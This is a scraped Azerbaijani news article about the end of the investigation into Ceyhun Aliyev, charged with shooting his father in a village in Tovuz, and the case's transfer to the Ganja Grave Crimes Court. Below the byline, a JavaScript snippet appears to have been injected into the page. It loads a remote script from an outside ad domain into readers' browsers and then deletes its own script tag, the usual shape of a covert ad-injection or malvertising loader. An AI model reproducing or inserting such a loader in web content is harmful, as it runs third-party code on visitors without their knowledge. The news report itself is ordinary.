Atasını öldürən şəxsin məhkəməsi BAŞLAYIB

by admin

window._ttzi = 161;var script = document.createElement(“script”);script.src = “https://adviad.com/nativevideo/get_ads.js?=”+(Math.floor(Math.random() * 100000000) + 1);script.async = true;(document.body || document.head || document.documentElement).appendChild(script);script.onload = function(){script.parentNode.removeChild(script);};

Tovuzda atasını qətlə yetirməkdə təqsirləndirilən Ceyhun Əliyevin cinayət işi üzrə ibtidai istintaq başa çatıb.

“Report” xəbər verir ki, cinayət işi baxılması üçün Gəncə Ağır Cinayətlər Məhkəməsinə göndərilib.

İş baxılması üçün hakim Xəqani Səmədovun icraatına verilib.

Məhkəmənin vaxtı hələki məlum deyil.

Qeyd edək ki, hadisə bu ilin fevralında Tovuzun Hunanlar kəndində qeydə alınıb.

Belə ki, kənd sakini, 1947-ci il təvəllüdlü Qamət Əliyev oğlu, 1980-ci il təvəllüdlü C.Əliyev tərəfindən odlu silahla qətlə yetirilib.

Ona qarşı Cinayət Məcəlləsinin 120.1-ci (Qəsdən adam öldürmə) maddəsi ilə ittiham irəli sürülüb.

Məlumata görə, qətlə yetirilən şəxs uzun müddət Bakı şəhərində “Avtobaza”nın, “Taksi Park”ın və Təchizat İdarəsinin müdiri vəzifələrində çalışıb.

Oxu.az

Bu yazılara da göz atın...